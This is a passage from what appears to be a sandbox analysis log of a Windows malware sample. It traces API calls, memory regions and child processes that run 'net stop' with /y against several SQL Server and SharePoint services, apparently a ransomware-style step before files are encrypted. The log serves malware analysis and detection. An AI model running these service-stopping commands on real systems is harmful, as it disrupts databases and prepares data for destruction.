"c:\\windows\\system32\\net1.exe") Region: id = 8413 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8414 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8415 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 8416 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8417 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8418 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8419 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8420 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8421 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8422 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8423 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 8424 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8425 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8426 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8427 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8428 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8429 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8430 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8431 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8432 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8433 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8434 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8435 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8436 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8437 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8438 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8439 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8440 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8441 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8442 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8443 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 671 os_tid = 0x944 [0105.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcd0 | out: lpSystemTimeAsFileTime=0x26fcd0*(dwLowDateTime=0xf440f3f0, dwHighDateTime=0x1d48689)) [0105.874] GetCurrentProcessId () returned 0xb18 [0105.875] GetCurrentThreadId () returned 0x944 [0105.875] GetTickCount () returned 0x24356 [0105.875] QueryPerformanceCounter (in: lpPerformanceCount=0x26fcd8 | out: lpPerformanceCount=0x26fcd8*=1815279300000) returned 1 [0105.877] GetModuleHandleW (lpModuleName=0x0) returned 0xff4c0000 [0105.892] __set_app_type (_Type=0x1) [0105.893] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4d9c9c) returned 0x0 [0105.893] __getmainargs (in: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788, _DoWildCard=0, _StartInfo=0xff4e479c | out: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788) returned 0 [0105.893] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.893] GetConsoleOutputCP () returned 0x1b5 [0105.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4ecec0 | out: lpCPInfo=0xff4ecec0) returned 1 [0105.893] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.895] sprintf_s (in: _DstBuf=0x26fc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.896] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.897] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.897] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0105.897] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fa10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.898] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.898] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc68 | out: Buffer=0x26fc68*=0xec0f0) returned 0x0 [0105.898] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc68 | out: Buffer=0x26fc68*=0xec110) returned 0x0 [0105.898] _fileno (_File=0x7fefdba2a80) returned 0 [0105.898] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.898] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.898] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.898] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.898] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.898] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.898] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.898] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.898] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.898] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.898] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.898] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.898] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.898] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.899] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.899] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.899] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.899] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.899] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.899] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.899] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.899] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.899] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0105.899] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0105.899] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0105.899] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0105.899] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0105.899] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0105.899] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0105.899] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0105.899] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0105.899] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0105.899] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0105.899] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0105.899] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0105.899] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.899] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.900] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SHAREPOINT") returned 7 [0105.900] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0105.900] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0105.900] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0105.900] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SHAREPOINT") returned -14 [0105.900] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0105.900] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0105.900] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0105.900] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0105.900] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0105.900] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0105.900] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0105.900] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0105.900] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0105.900] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0105.900] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned -9 [0105.900] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0105.900] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.900] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.900] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0105.900] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0105.900] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0105.900] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0105.900] _wcsupr (in: _String="MSSQLFDLauncher$SHAREPOINT" | out: _String="MSSQLFDLAUNCHER$SHAREPOINT") returned="MSSQLFDLAUNCHER$SHAREPOINT" [0105.901] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xece20 [0105.905] GetServiceKeyNameW (in: hSCManager=0xece20, lpDisplayName="MSSQLFDLAUNCHER$SHAREPOINT", lpServiceName=0xff4e5750, lpcchBuffer=0x26fb88 | out: lpServiceName="", lpcchBuffer=0x26fb88) returned 0 [0105.906] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0105.906] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -14 [0105.906] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0105.906] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0105.906] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0105.906] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0105.906] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0105.906] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0105.906] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0105.906] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0105.906] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 3 [0105.906] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -9 [0105.907] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0105.907] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0105.907] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0105.907] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0105.907] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0105.907] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0105.907] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 1 [0105.907] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x26fb90 | out: bufptr=0x26fb90) returned 0x889 [0105.908] wcscpy_s (in: _Destination=0xff4e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.908] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0105.909] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.910] GetFileType (hFile=0xb) returned 0x2 [0105.911] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa58 | out: lpMode=0x26fa58) returned 1 [0105.911] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fa50, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x26fa50*=0x1e) returned 1 [0105.911] GetFileType (hFile=0xb) returned 0x2 [0105.912] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa58 | out: lpMode=0x26fa58) returned 1 [0105.912] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa50, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x26fa50*=0x2) returned 1 [0105.912] _ultow (in: _Dest=0x889, _Radix=2554560 | out: _Dest=0x889) returned="2185" [0105.912] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.912] GetFileType (hFile=0xb) returned 0x2 [0105.913] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa58 | out: lpMode=0x26fa58) returned 1 [0105.913] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fa50, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x26fa50*=0x34) returned 1 [0105.913] GetFileType (hFile=0xb) returned 0x2 [0105.913] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa58 | out: lpMode=0x26fa58) returned 1 [0105.914] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa50, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x26fa50*=0x2) returned 1 [0105.914] NetApiBufferFree (Buffer=0xec0f0) returned 0x0 [0105.914] NetApiBufferFree (Buffer=0xec110) returned 0x0 [0105.914] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0105.914] exit (_Code=2) Process: id = "215" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e124000" os_pid = "0x824" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLSERVER /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8468 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8469 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8470 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8471 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8472 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8473 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8474 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8475 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8476 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8477 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8478 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 8479 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8480 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8481 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8482 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 672 os_tid = 0x6d8 Process: id = "216" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e343000" os_pid = "0x228" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8483 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8484 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8485 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 8486 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8487 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8488 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8489 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8490 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8491 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8492 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8493 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 8494 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8495 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8496 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8497 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 674 os_tid = 0x260 Process: id = "217" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e063000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8518 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8519 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8520 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8521 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8522 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8523 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id 